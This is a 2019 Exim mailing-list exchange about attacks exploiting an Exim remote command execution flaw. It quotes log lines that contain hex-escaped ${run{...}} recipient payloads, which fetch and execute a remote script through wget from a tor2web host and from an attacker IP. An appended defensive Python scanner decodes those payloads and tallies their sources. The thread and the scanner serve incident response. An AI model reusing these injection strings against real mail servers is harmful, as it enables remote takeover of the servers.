On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users wrote:
> Check your system for unusual activities.
> Symptoms on a hacked system I got aware of were quite similar. The
> log
> reported about too many received headers:
>
> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
> 2019-06-20 15:13:33 Received from <> H=(<zensored>.de) [89.248.171.57] P=smtp S=1114
> 2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zensored>.de: Too many "Received" headers - suspected mail loop
> *** Frozen (delivery error message)
Checked my mail server today as well and found 46 frozen mails and
plenty of the same log messages. All of the mails were sent from a
single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
are sent every 3 hours.
As far as I can tell nothing was changed on the server though. Files
are fine, cron entries are standard and no cryptominer is running (CPU
utilization is low).
> That would have been a better line in the logs (from a fixed system):
> 2019-06-19 04:07:40 H=(service.com) [68.183.4.19] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20213.227.155.101\x2ftmp\x2f212.80.235.131\x22}}@localhost>: relay not permitted
None of these though, and I patched my Exim as soon as the Debian
update was ready (On the 5th).
Is Debian's exim4 version 4.89-2+deb9u4 not patched properly?
Cheers,
Tom.
--
Thomas "Duke" Hager duke@???
GPG: 2048R/791C5EB1 http://www.sigsegv.at/gpg/duke.gpg
=================================================================
"Never Underestimate the Power of Stupid People in Large Groups."
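The two log excerpts quoted in this message show the injected `${run{...}}` recipient local part with the command hex-escaped, which makes it hard to see at a glance what the sender was trying to run. Below is a small log scanner, added here as an example and not code from the thread, from Exim or from Debian: it pulls `${run{...}}` local parts out of mainlog-style lines, decodes Exim's `\xhh`, `\n`, `\r` and `\t` string escapes so the command can be read, and tallies sending IPs, falling back to the message id to find the H= line when the failure line itself carries no address (as in the `exim -Mvl` output above). The log lines inside it are constructed to mimic Exim's mainlog layout; the two payloads are the ones quoted in this thread. Octal `\ddd` escapes are not handled, and the decoded string is only for reading, never for execution.

```python
"""Find ${run{...}} recipient local parts in Exim mainlog lines and decode
the backslash escapes so the injected command is readable.

Added example for the exim-users thread; not Exim's own code.  SAMPLE_LOG is
constructed to look like Exim's mainlog (timestamp, optional message id,
H=(helo) [ip] ...); the payloads are the ones quoted in the thread.
"""
import re
from collections import Counter, namedtuple

SAMPLE_LOG = r"""
2019-06-20 15:13:33 1hdwsf-0006h5-EE <= <> H=(<zensored>.de) [89.248.171.57] P=smtp S=1114
2019-06-20 15:13:33 1hdwsf-0006h5-EE ** root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zensored>.de: Too many "Received" headers - suspected mail loop
2019-06-19 04:07:40 H=(service.com) [68.183.4.19] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20213.227.155.101\x2ftmp\x2f212.80.235.131\x22}}@localhost>: relay not permitted
2019-06-21 09:00:12 1hdxyz-0001Ab-CD <= alice@example.org H=mail.example.org [192.0.2.10] P=esmtps S=2048
"""

# timestamp, then optionally Exim's xxxxxx-yyyyyy-zz message id as the next field
TS_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?:(?P<id>\w{6}-\w{6}-\w{2}) )?")
# first bracketed IPv4 address on the line (the H=... [ip] field)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# Exim's \x escape takes up to two hex digits
HEX_RE = re.compile(r"[0-9a-fA-F]{1,2}")
SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}

Hit = namedtuple("Hit", "timestamp ip raw decoded")


def decode_exim_escapes(s: str) -> str:
    """Undo \\xhh, \\n, \\r, \\t; any other backslash escape yields the next char."""
    out = []
    i, n = 0, len(s)
    while i < n:
        c = s[i]
        if c != "\\" or i + 1 >= n:
            out.append(c)
            i += 1
            continue
        nxt = s[i + 1]
        if nxt == "x":
            m = HEX_RE.match(s, i + 2)
            if m:
                out.append(chr(int(m.group(0), 16)))
                i = m.end()
                continue
        out.append(SIMPLE_ESCAPES.get(nxt, nxt))
        i += 2
    return "".join(out)


def extract_run_payload(line: str):
    """Return the text inside the first ${run{...}} on the line, or None.
    Braces are balanced so a '}' inside the command does not cut it short."""
    start = line.find("${run{")
    if start < 0:
        return None
    i = start + len("${run{")
    depth, j = 1, i
    while j < len(line) and depth:
        if line[j] == "{":
            depth += 1
        elif line[j] == "}":
            depth -= 1
        j += 1
    if depth:          # truncated line, closing brace never seen
        return None
    return line[i:j - 1]


def scan_log(text: str):
    """Yield one Hit per line carrying a ${run{...}} local part."""
    ip_by_msgid = {}   # message id -> sending IP seen on its H= line
    hits = []
    for line in text.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue
        msgid = m.group("id")
        ipm = IP_RE.search(line)
        if msgid and ipm:
            ip_by_msgid[msgid] = ipm.group(1)
        payload = extract_run_payload(line)
        if payload is None:
            continue
        ip = ipm.group(1) if ipm else ip_by_msgid.get(msgid, "unknown")
        hits.append(Hit(m.group("ts"), ip, payload, decode_exim_escapes(payload)))
    return hits


def sources(hits):
    """Count hits per sending IP, to see which scanner is hammering the box."""
    return Counter(h.ip for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.timestamp} from {h.ip}:\n    {h.decoded!r}")
    print("per source:", dict(sources(found)))
```

Run it against a real file with `scan_log(open("/var/log/exim4/mainlog").read())`; a source that appears on a fixed schedule, like the three-hourly sender mentioned above, shows up immediately in the per-IP count.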